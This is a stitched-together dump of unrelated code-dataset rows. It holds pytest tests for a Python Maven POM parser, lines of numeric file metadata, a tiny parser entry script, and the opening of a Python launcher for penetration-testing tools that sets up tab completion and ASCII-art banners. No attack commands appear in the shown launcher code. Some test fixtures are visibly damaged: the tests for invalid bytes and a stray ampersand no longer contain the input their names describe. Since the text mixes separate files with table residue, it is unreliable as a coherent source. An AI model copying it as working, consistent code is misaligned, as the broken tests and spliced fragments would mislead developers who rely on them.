    assert pom.parent.version == '2.2.5'
    # Grandparent fetched through the parent's own <parent> declaration.
    assert pom.parent.parent.group_id == 'org.apache.cxf'
    assert pom.parent.parent.artifact_id == 'cxf'
    assert pom.parent.parent.version == '2.2.5'
    assert pom.parent.parent.parent is None


@VCR.use_cassette('maven_pom_parse_xml_with_group_id_from_parent.yaml')
def test_parse_xml_with_group_id_from_parent(registry):
    """A POM without its own <groupId> inherits the parent's group id."""
    xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<parent>
<groupId>org.apache.cxf</groupId>
<artifactId>cxf-parent</artifactId>
<version>2.2.5</version>
<relativePath>../parent</relativePath>
</parent>
</project>
''')
    pom = MavenPom.parse(xml, registry)
    assert pom.group_id == 'org.apache.cxf'
def test_parse_xml_with_properties(registry):
    """<properties> children become a plain dict of tag-name -> text."""
    xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<properties>
<stax.impl.groupid>org.codehaus.woodstox</stax.impl.groupid>
<stax.impl.artifact>wstx-asl</stax.impl.artifact>
<stax.impl.version>3.2.9</stax.impl.version>
<failIfNoTests>false</failIfNoTests>
</properties>
</project>
''')
    pom = MavenPom.parse(xml, registry)
    assert pom.properties == {
        'stax.impl.groupid': 'org.codehaus.woodstox',
        'stax.impl.artifact': 'wstx-asl',
        'stax.impl.version': '3.2.9',
        'failIfNoTests': 'false'
    }


@VCR.use_cassette('maven_pom_parse_xml_with_properties_merged_with_parent_properties.yaml')
def test_parse_xml_with_properties_merged_with_parent_properties(registry):
    """Own properties are merged with those of the resolved parent POM."""
    xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<parent>
<groupId>org.apache</groupId>
<artifactId>apache</artifactId>
<version>7</version>
</parent>
<properties>
<stax.impl.groupid>org.codehaus.woodstox</stax.impl.groupid>
<stax.impl.artifact>wstx-asl</stax.impl.artifact>
<stax.impl.version>3.2.9</stax.impl.version>
<failIfNoTests>false</failIfNoTests>
</properties>
</project>
''')
    pom = MavenPom.parse(xml, registry)
    # First four entries come from this POM; the rest from the org.apache:apache
    # parent recorded in the cassette.
    assert pom.properties == {
        'stax.impl.groupid': 'org.codehaus.woodstox',
        'stax.impl.artifact': 'wstx-asl',
        'stax.impl.version': '3.2.9',
        'failIfNoTests': 'false',
        'distMgmtSnapshotsName': 'Apache Development Snapshot Repository',
        'distMgmtSnapshotsUrl': 'https://repository.apache.org/content/repositories/snapshots',
        'organization.logo': 'http://www.apache.org/images/asf_logo_wide.gif',
        'project.build.sourceEncoding': 'UTF-8',
        'sourceReleaseAssemblyDescriptor': 'source-release'
    }


def test_parse_xml_with_only_one_property(registry):
    """A single property still produces a dict (not a scalar)."""
    xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<properties>
<stax.impl.groupid>org.codehaus.woodstox</stax.impl.groupid>
</properties>
</project>
''')
    pom = MavenPom.parse(xml, registry)
    assert pom.properties == {'stax.impl.groupid': 'org.codehaus.woodstox'}


def test_parse_xml_with_empty_properties_block(registry):
    """An empty <properties> element yields an empty dict."""
    xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<properties>
</properties>
</project>
''')
    pom = MavenPom.parse(xml, registry)
    assert pom.properties == {}
def test_parse_xml_with_only_one_license(registry):
    """A single structured <license> yields a one-element name list."""
    xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<licenses>
<license>
<name>MIT</name>
<url>http://opensource.org/licenses/MIT</url>
<distribution>repo</distribution>
</license>
</licenses>
</project>
''')
    pom = MavenPom.parse(xml, registry)
    assert pom.licenses == ['MIT']


def test_parse_xml_without_licenses_block(registry):
    """No <licenses> element at all -> empty list."""
    xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
</project>
''')
    pom = MavenPom.parse(xml, registry)
    assert pom.licenses == []


def test_parse_xml_with_empty_licenses_block(registry):
    """An empty <licenses> element -> empty list."""
    xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<licenses>
</licenses>
</project>
''')
    pom = MavenPom.parse(xml, registry)
    assert pom.licenses == []


def test_parse_xml_with_scalar_license_block(registry):
    """A bare-text <license> (no <name> child) is accepted as the license name."""
    xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<licenses>
<license>MIT</license>
</licenses>
</project>
''')
    pom = MavenPom.parse(xml, registry)
    assert pom.licenses == ['MIT']


def test_parse_xml_with_empty_license_block(registry):
    """An empty <license></license> entry is silently dropped."""
    xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<licenses>
<license></license>
</licenses>
</project>
''')
    pom = MavenPom.parse(xml, registry)
    assert pom.licenses == []
def test_parse_xml_without_url_tag(registry):
    """No <url> and no <scm> -> urls is the empty set."""
    xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
</project>
''')
    pom = MavenPom.parse(xml, registry)
    assert pom.urls == set()


def test_parse_xml_with_empty_url_tag(registry):
    """An empty <url></url> contributes nothing to the url set."""
    xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<url></url>
</project>
''')
    pom = MavenPom.parse(xml, registry)
    assert pom.urls == set()


def test_parse_xml_without_scm_block(registry):
    """Missing <scm> block -> no SCM url collected."""
    xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
</project>
''')
    pom = MavenPom.parse(xml, registry)
    assert pom.urls == set()


def test_parse_xml_with_empty_scm_block(registry):
    """An empty <scm></scm> element -> no SCM url collected."""
    xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<scm></scm>
</project>
''')
    pom = MavenPom.parse(xml, registry)
    assert pom.urls == set()


def test_parse_xml_with_scm_block_without_url(registry):
    """An <scm> with only a <connection> (no <url>) contributes nothing."""
    xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<scm>
<connection>scm:git:git@github.com:non/kind-projector.git</connection>
</scm>
</project>
''')
    pom = MavenPom.parse(xml, registry)
    assert pom.urls == set()
def test_parse_xml_with_whitespace_at_beginning(registry):
    """Leading whitespace before the XML declaration must not break parsing."""
    # Deliberately NOT dedent()-ed: the newline before <?xml ... ?> is the
    # whole point of this test.
    xml = '''
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<groupId>org.spire-math</groupId>
<artifactId>kind-projector_2.10</artifactId>
</project>
'''
    pom = MavenPom.parse(xml, registry)
    assert pom.group_id == 'org.spire-math'
    assert pom.artifact_id == 'kind-projector_2.10'


def test_parse_xml_with_invalid_bytes_at_beginning(registry):
    """Garbage bytes before the XML declaration are tolerated by the parser."""
    # NOTE(review): in this copy the literal starts directly at <?xml ...,
    # so the "invalid bytes" this test is named for appear to have been
    # stripped from the source text -- confirm against the upstream repo.
    xml = '''<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<groupId>org.spire-math</groupId>
<artifactId>kind-projector_2.10</artifactId>
</project>
'''
    pom = MavenPom.parse(xml, registry)
    assert pom.group_id == 'org.spire-math'
    assert pom.artifact_id == 'kind-projector_2.10'


def test_parse_xml_ignoring_ampersand_character(registry):
    """A stray ampersand in <developer><id> must not abort parsing."""
    # NOTE(review): the <id> payload looks mangled in this copy (just a
    # space); per the test name it presumably contained a raw ampersand
    # originally -- verify against the upstream repository.
    xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<groupId>org.spire-math</groupId>
<artifactId>kind-projector_2.10</artifactId>
<developers>
<developer>
<id> </id>
<name>Simeon Fitch</name>
<url>http://www.mseedsoft.com/</url>
<roles>
<role>Developer</role>
</roles>
</developer>
</developers>
</project>
''')
    pom = MavenPom.parse(xml, registry)
    assert pom.group_id == 'org.spire-math'
    assert pom.artifact_id == 'kind-projector_2.10'
@pytest.fixture
def pom(parent_pom):
    """Child POM wired to *parent_pom*, carrying two properties of its own."""
    own_properties = {
        'foo.bar': 'FooBar',
        'hello': 'hello-world'
    }
    return MavenPom(
        group_id='com.example.foobar',
        artifact_id='foobar',
        version='1.2.3',
        parent=parent_pom,
        properties=own_properties
    )
@pytest.fixture
def parent_pom():
    """Stand-alone parent POM (no grandparent) with two properties."""
    inherited = {
        'hiThere': 'hi_there',
        'omg': 'oh-my-god'
    }
    return MavenPom(
        group_id='com.example',
        artifact_id='foobar-parent',
        version='4.5.6',
        parent=None,
        properties=inherited
    )
def test_get_project_builtin_properties(pom):
    """Both the 'project.' and 'pom.' prefixes resolve the POM's own coordinates."""
    for prefix in ('project', 'pom'):
        assert pom.get_property(prefix + '.groupId') == 'com.example.foobar'
        assert pom.get_property(prefix + '.artifactId') == 'foobar'
        assert pom.get_property(prefix + '.version') == '1.2.3'


def test_get_project_parent_builtin_properties(pom):
    """'project.parent.*' and 'pom.parent.*' resolve the parent POM's coordinates."""
    for prefix in ('project.parent', 'pom.parent'):
        assert pom.get_property(prefix + '.groupId') == 'com.example'
        assert pom.get_property(prefix + '.artifactId') == 'foobar-parent'
        assert pom.get_property(prefix + '.version') == '4.5.6'
def test_existing_property(pom):
    """Properties declared on the POM itself are returned verbatim."""
    expected = {'foo.bar': 'FooBar', 'hello': 'hello-world'}
    for key, value in expected.items():
        assert pom.get_property(key) == value


def test_existing_parent_property(pom):
    """Lookups fall back to properties declared on the parent POM."""
    expected = {'hiThere': 'hi_there', 'omg': 'oh-my-god'}
    for key, value in expected.items():
        assert pom.get_property(key) == value


def test_nonexistent_property(pom):
    """Unknown keys return None under every supported prefix."""
    for key in ('wtf', 'project.wtf', 'pom.wtf',
                'project.parent.wtf', 'pom.parent.wtf'):
        assert pom.get_property(key) is None
| 36.504013
| 110
| 0.582798
| 2,760
| 22,742
| 4.71087
| 0.069565
| 0.051223
| 0.016844
| 0.099677
| 0.841486
| 0.811183
| 0.753576
| 0.734887
| 0.674358
| 0.656822
| 0
| 0.031638
| 0.256442
| 22,742
| 622
| 111
| 36.562701
| 0.737138
| 0
| 0
| 0.701128
| 0
| 0.048872
| 0.694398
| 0.131299
| 0
| 0
| 0
| 0
| 0.12218
| 1
| 0.06015
| false
| 0
| 0.015038
| 0.005639
| 0.080827
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ba49b86e555ba36960129983c6c19aa4b860eb19
| 70
|
py
|
Python
|
parser_utils.py
|
grwgreg/silviux
|
69ab953be83e920e8bf397a3549ab3d955f653c1
|
[
"BSD-2-Clause"
] | 54
|
2021-03-23T02:10:15.000Z
|
2022-03-06T03:29:29.000Z
|
parser_utils.py
|
grwgreg/silviux
|
69ab953be83e920e8bf397a3549ab3d955f653c1
|
[
"BSD-2-Clause"
] | null | null | null |
parser_utils.py
|
grwgreg/silviux
|
69ab953be83e920e8bf397a3549ab3d955f653c1
|
[
"BSD-2-Clause"
] | 3
|
2021-07-28T20:48:15.000Z
|
2021-09-17T23:35:58.000Z
|
# Thin entry script: import the parser utilities package and hand control to it.
import silviux.parser.parser_utils
# NOTE(review): run() is defined inside silviux.parser.parser_utils; its
# behavior is not visible from this file.
silviux.parser.parser_utils.run()
| 17.5
| 34
| 0.842857
| 10
| 70
| 5.7
| 0.5
| 0.45614
| 0.666667
| 0.842105
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.057143
| 70
| 3
| 35
| 23.333333
| 0.863636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
ba81f5e235a85a4037aaef00acf7e30d10210ebc
| 384,817
|
py
|
Python
|
mksec.py
|
generatorexit/mksec
|
f4b4dc31b4248658b4cad0fe25c7d7a836a375d4
|
[
"MIT"
] | null | null | null |
mksec.py
|
generatorexit/mksec
|
f4b4dc31b4248658b4cad0fe25c7d7a836a375d4
|
[
"MIT"
] | null | null | null |
mksec.py
|
generatorexit/mksec
|
f4b4dc31b4248658b4cad0fe25c7d7a836a375d4
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import random
import readline
# Vocabulary for readline tab-completion: menu commands, category names and
# every tool name the interactive shell understands.
autocompleter = ["no banner","banner","menu","exit","quit","help","?","about","clear","back","information gathering","vulnerability analysis","web application analysis","password attacks","wireless attacks","exploitation tools","sniffing & spoofing","post exploitation","forensics","reporting tools","linux commands","mksec tools","show all tools","dmitry","ike-scan","netdiscover","nbtscan","nmap","theharvester","information gathering more","nikto","unix-privesc-check","chkrootkit","lynis","nessus","skipfish","wpscan","sqlmap","cewl","crunch","hashcat","john","medusa","ncrack","hash-identifier","hashid","wordlists","searchsploit","veil","macchanger","exe2hex","weevely","binwalk","bulk_extractor","foremost","hashdeep","cutycapt","pipal","find","grep","man","payload creator and listener"]
def completer(text, state):
    """Readline completion hook: return the state-th entry of `autocompleter`
    that starts with the (lower-cased) typed prefix, or None when exhausted."""
    prefix = text.lower()
    matches = [entry for entry in autocompleter if entry.startswith(prefix)]
    try:
        return matches[state]
    except IndexError:
        # readline keeps calling with increasing state until it gets None.
        return None
# Install the completion hook, bind Tab to it, and start with a clean screen.
readline.set_completer(completer)
readline.parse_and_bind("tab: complete")
os.system("clear")
# TODO: add responder; adding msfconsole at the end could be an option. Remove veil from the post-exploitation category.
# TODO: mitmproxy, netsniff-ng, dirbuster and golismero could be added; if they are not added, remove them from the category listing.
try:
banner1 = ("\x1b[1m\x1b[31m\n\n\n\n\n0111100101101111011101010010000001110010\n0110010101100001011011000110110001111001\n0010000001101000011000010111011001100101\n0010000001110100011011110010000001101101\n0111010101100011011010000010000001110100\n0110100101101101011001010010000001101111\n0110111000100000011110010110111101110101\n0111001000100000011010000110000101101110\n0110010001110011001000000010100000111010\n0010000001110100011010000110000101101110\n0110101101110011001000000110011001101111\n0111001000100000011101010111001101101001\n0110111001100111001000000111010001101000\n0110010100100000011011010110101101110011\n0110010101100011001011100010000000101010\n0110100001110101011001110111001100101010\n\n\n\n\n")
banner2 = ("\x1b[1m\x1b[36m\n\n\n\n\n\n\n\n\n\n.##.....##.##....##..######..########..######.\n.###...###.##...##..##....##.##.......##....##\n.####.####.##..##...##.......##.......##......\n.##.###.##.#####.....######..######...##......\n.##.....##.##..##.........##.##.......##......\n.##.....##.##...##..##....##.##.......##....##\n.##.....##.##....##..######..########..######.\n\n\n\n\n\n\n\n\n")
banner3 =("\x1b[1m\x1b[36m\n\n\n\n\n\n\n\n\n\n##::::'##:'##:::'##::'######::'########::'######::\n###::'###: ##::'##::'##... ##: ##.....::'##... ##:\n####'####: ##:'##::: ##:::..:: ##::::::: ##:::..::\n## ### ##: #####::::. ######:: ######::: ##:::::::\n##. #: ##: ##. ##::::..... ##: ##...:::: ##:::::::\n##:.:: ##: ##:. ##::'##::: ##: ##::::::: ##::: ##:\n##:::: ##: ##::. ##:. ######:: ########:. ######::\n..:::::..::..::::..:::......:::........:::......::\n\n\n\n\n\n\n\n")
banner4 =("\x1b[1m\x1b[33m\n\n\n\n\n\n\n A\n /_\\\n : /_|_\\\n ::: /|__|_\\\n ::.:: /|_|__|_\ :\n ::.:.::/__|_|__|_\ :.:\n :..:.:./_|__|__|__|\ :.:.:\n :.:..:./|__|___|__|__\:.:..::\n ......::..:../__|___|__|___|_\..:..::........\n ..:..:..:/_|__|___|___|___|\:..:..::::::::::::\n ::::.:..:./___|___|___|___|___\..........\n.........../..!...!...!...!...!..\...........\n\t\t \x1b[36m \x1b[5m-mksec- \x1b[0m \x1b[1m\n\n\n\n\n\n")
banner5 =("\x1b[1m\x1b[33m\n\n\n\n\n\n \x1b[33m/\\\n \x1b[33m/ \ \x1b[36m___\x1b[36m\n \x1b[36m\ __ \x1b[33m/ \ \x1b[36m__ /\n \x1b[36m\ / \ _ \x1b[33m/ <()> \ \x1b[36m_ / \ /\n \x1b[36m\_/ \_/ \_\x1b[33m/________\\\x1b[36m_/ \_/ \_/\n\x1b[37m_______________\x1b[33m/__I___I___\\\x1b[37m________________\n \x1b[33m/_I___I___I__\\\n /I___I___I___I_\\\n /___I___I___I___I\\\n /__I___I___I___I___\\\n /_I___I___I___I___I__\\\n /I___I___I___I___I___I_\\\n /___I___I___I___I___I___I\\\n /__I___I___I___I___I___I___\\\n /_I___I___I___I___I___I___I__\\\x1b[37m\n\x1b[36m\t\t \x1b[5m-mksec- \x1b[0m \x1b[1m\n\n\n\n")
banner6 =("\x1b[1m\x1b[31m\n\n\nILOVEYOUILOVEYOUILOVEYOUILOVEYOUILOVEYOUILO\nILOVEYOUILO \x1b[37m****** \x1b[31mVEYOU \x1b[37m****** \x1b[31mILOVEYOUILO\nILOVEYOU \x1b[37m*********** \x1b[31mI \x1b[37m*********** \x1b[31mLOVEYOUI\nOUIUI \x1b[37m*************** *************** \x1b[31mVEYOU\nYOUI \x1b[37m********************************** \x1b[31mLOV\nIL \x1b[37m************************************* \x1b[31mOV\nL \x1b[37m*****************\x1b[36m\x1b[5mmksec\x1b[0m\x1b[1m***************** \x1b[31mO\nI \x1b[37m*************************************** \x1b[31mL\nU \x1b[37m*************************************** \x1b[31mI\nOU \x1b[37m************************************* \x1b[31mIL\nUIL \x1b[37m*********************************** \x1b[31mOVE\nOVEYO \x1b[37m******************************* \x1b[31mULOVE\nOVEYOUI \x1b[37m**************************** \x1b[31mLOVEYO\nEYOUILOVE \x1b[37m*********************** \x1b[31mYOUILOVEY\nVEYOUILOVEYOU \x1b[37m***************** \x1b[31mILOVEYOUILO\nILOVEYOUILOVEYO \x1b[37m************* \x1b[31mLOVEYOUILOVEY\nUILOVEYOUILOVEYOU \x1b[37m********* \x1b[31mLOVEYOUILOVEYOU\nLOVEYOUILOVEYOUILOV \x1b[37m***** \x1b[31mILOVEYOUILOVEYOUI\nEYOUILOVEYOUILOVEYOU \x1b[37m*** \x1b[31mYOULOVEYOUILOVEYOU\nVEYOUILOVEYOUILOVEYOU \x1b[37m* \x1b[31mVEYOUILOVEYOUILOVEY\nOVEYOUILOVEYOUILOVEYOUILOVEYOUILOVEYOUILOVE\n\n")
banner7 =('\x1b[1m\x1b[37m\n\n\n\n\n\n\n888888888888888888888888888888888888888888888888888888888888\n888888888888888888888888888888888888888888888888888888888888\n8888888888888888888888888P"" ""9888888888888888888888888888\n8888888888888888P"88888P 988888"9888888888888888888\n8888888888888888 "9888 888P" 888888888888888888\n888888888888888888bo "9 d8o o8b P" od88888888888888888888\n888888888888888888888bob 98" "8P dod88888888888888888888888\n888888888888888888888888 db 88888888888888888888888888\n88888888888888888888888888 8888888888888888888888888888\n88888888888888888888888P"9bo odP"98888888888888888888888888\n88888888888888888888P" od88888888bo "98888888888888888888888\n888888888888888888 d88888888888888b 88888888888888888888\n8888888888888888888oo8888888888888888oo888888888888888888888\n888888888888888888888888888888888888888888888888888888888888\n\n\n\n\n')
banner8 =("""\x1b[1m\x1b[33m\n\n\n\n\n /^\\\n \x1b[35mL L \x1b[33m/ \ \x1b[35mL L\n __/|/|_ \x1b[33m/ . \ \x1b[35m_|\|\__\n /_| [_[_\ \x1b[33m/ .-\ \x1b[35m/_]_] |_\\\n /__\ __`-\_____ \x1b[33m/ . \ \x1b[35m_____/-`__ /__\\\n /___] /=@> _ {> \x1b[33m/-. \ \x1b[35m<} _ <@=\ [___\\\n /____/ /` `--/ \x1b[33m/ . \ \x1b[35m\--` `\ \____\\\n /____/ \____/`-._> \x1b[33m/ \ \x1b[35m<_.-`\____/ \____\\\n /____/ /__/ \x1b[33m/-._ . _.- \ \x1b[35m\__\ \____\\\n /____/ /__/ \x1b[33m/ . \ \x1b[35m\__\ \____\\\n|____/_ _/__/ \x1b[33m/ . \ \x1b[35m\__\_ _\____|\n \__/_ ``_|_/ \x1b[33m/ -._ . _.-\ \x1b[35m\_|_`` _\___/\n /__`-`__\ \x1b[33m<_ `-; _> \x1b[35m/__`-`__\\\n `-` \x1b[33m`-._ ; _.-` \x1b[35m`-`\n \x1b[33m`-._ ; _.-`\n \x1b[33m`-._.-`\n\n\n\n\n""")
banner9 =("""\x1b[1m\x1b[33m\n\n \x1b[37m ___\n \x1b[37m,o88888\n \x1b[37m,o8888888'\n \x1b[33m,:o:o:oooo. \x1b[37m,8O88Pd8888"\n \x1b[33m,.::.::o:ooooOoOoO. \x1b[37m,oO8O8Pd888'"\n \x1b[33m,.:.::o:ooOoOoOO8O8OOo.\x1b[37m8OOPd8O8O"\n \x1b[33m, ..:.::o:ooOoOOOO8OOOOo.\x1b[37mFdO8O8"\n \x1b[33m, ..:.::o:ooOoOO8O888O8O\x1b[37m,COmCOO"\n \x1b[33m, . ..:.::o:ooOoOOOO8OOO\x1b[37mOCOCO"\n \x1b[33m. ..:.::o:ooOoOoOO8O\x1b[37m8OCCCC"\x1b[33mo\n \x1b[33m. ..:.::o:ooooO\x1b[37moCoCCC"\x1b[33mo:o\n \x1b[33m. ..:.::o:o:\x1b[37m,cooooCo"\x1b[33moo:o:\n \x1b[33m` . . ..:.\x1b[37m:cocoooo"'\x1b[33mo:o:::'\n \x1b[37m.\x1b[33m` . ..\x1b[37m::ccccoc"'\x1b[33mo:o:o:::'\n \x1b[37m:.:.\x1b[33m \x1b[37m,c:cccc"'\x1b[33m:.:.:.:.:.'\n \x1b[37m..:.:"'\x1b[33m`\x1b[37m::::c:"'\x1b[33m..:.:.:.:.:.'\n \x1b[37m...:.'.:.::::"'\x1b[33m . . . . .'\n \x1b[37m.. . ....:."' \x1b[33m` . . . ''\n \x1b[37m. . . ...."'\n \x1b[37m.. . ."'\n\x1b[37m.\n\n\n""")
banner10 =("\x1b[1m\x1b[31m\n\n ..:::::::::..\n ..:::\x1b[37maad8888888baa\x1b[31m:::..\n .::::\x1b[37md:?88888888888?::8b\x1b[31m::::.\n .:::\x1b[37md8888:?88888888??a888888b\x1b[31m:::.\n .:::\x1b[37md8888888a8888888aa8888888888b\x1b[31m:::.\n ::::\x1b[37mdP::::::::88888888888::::::::Yb\x1b[31m::::\n ::::\x1b[37mdP:::::::::Y888888888P:::::::::Yb\x1b[31m::::\n ::::\x1b[37md8:::::::::::Y8888888P:::::::::::8b\x1b[31m::::\n.::::\x1b[37m88::::::::::::Y88888P::::::::::::88\x1b[31m::::.\n:::::\x1b[37mY8baaaaaaaaaa88P:T:Y88aaaaaaaaaad8P\x1b[31m:::::\n:::::::\x1b[37mY88888888888P::|::Y88888888888P\x1b[31m:::::::\n::::::::::::::::\x1b[37m888:::|:::888\x1b[31m::::::::::::::::\n`:::::::::::::::\x1b[37m8888888888888b\x1b[31m::::::::::::::'\n :::::::::::::::\x1b[37m88888888888888\x1b[31m::::::::::::::\n :::::::::::::\x1b[37md88888888888888\x1b[31m:::::::::::::\n ::::::::::::\x1b[37m88::88::88:::88\x1b[31m::::::::::::\n `::::::::::\x1b[37m88::88::88:::88\x1b[31m::::::::::'\n `::::::::\x1b[37m88::88::P::::88\x1b[31m::::::::'\n `::::::\x1b[37m88::88:::::::88\x1b[31m::::::'\n ``:::::::::::::::::::''\n ``:::::::::''\n\n\n")
banner11 =("""\x1b[1m\x1b[31m\n , ,\n ,-`{-`/\n ,-~ , \ {-~~-,\n ,~ , ,`,-~~-,`,\n ,` , { { } } \x1b[32m}/\x1b[31m\n ; ,--/`\ \ / / \x1b[32m}/ /,/\x1b[31m\n; ,-./ \ \ { { ( \x1b[32m/,; ,/ ,/\x1b[31m\n; / ` } } `, `-`-.___ \x1b[32m/ `, ,/ `,/\x1b[31m\n \| ,`,` `~.___,---} \x1b[32m/ ,`,,/ ,`,;\x1b[31m\n ` { { \x1b[32m__ / ,`/ ,`,;\x1b[31m\n / \ \ \x1b[32m_,`, `{ `,{ `,`;`\x1b[31m\n { } } \x1b[37m/~\ \x1b[33m.-:::-. \x1b[32m(--, ;\ `,} `,`;\x1b[31m\n \\._./ / \x1b[37m/` , \ \x1b[33m,:::::::::, \x1b[32m`~; \},/ `,`; ,-=-\x1b[31m\n `-..-` \x1b[37m/. ` .\_ \x1b[33m;:::::::::::; \x1b[32m__,{ `/ `,`; {\x1b[31m\n \x1b[37m/ , ~ . ^ `~`\\\x1b[33m:::::::::::\x1b[32m<<~>-,,`, `-, ``,_ }\x1b[31m\n \x1b[37m/~~ . ` . ~ , .`~~\\\x1b[33m:::::::; \x1b[32m_-~ ;__, `,-`\x1b[31m\n \x1b[37m/`\ /~, . ~ , ' ` , .` \\\x1b[33m::::;` \x1b[32m<<<~``` ``-,,__ ;\x1b[31m\n \x1b[37m/` .`\ /` . ^ , ~ , . ` . ~\~ \x1b[32m\\\\, `,__\x1b[31m\n \x1b[37m/ ` , ,`\. ` ~ , ^ , ` ~ . . ``~~~`, \x1b[32m`-`--, \\\x1b[31m\n \x1b[37m/ , ~ . ~ \ , ` . ^ ` , . ^ . , ` .`-,___,---,__ \x1b[32m``\x1b[31m\n \x1b[37m/` ` . ~ . ` `\ ` ~ , . , ` , . ~ ^ , . ~ , .`~---,___\n \x1b[37m/` . ` , . ~ , \ ` ~ , . ^ , ~ . ` , ~ . ^ , ~ . `-,\n\n\n""")
bannerList = [banner1, banner2, banner3, banner4, banner5, banner6, banner7, banner8, banner9, banner10, banner11]
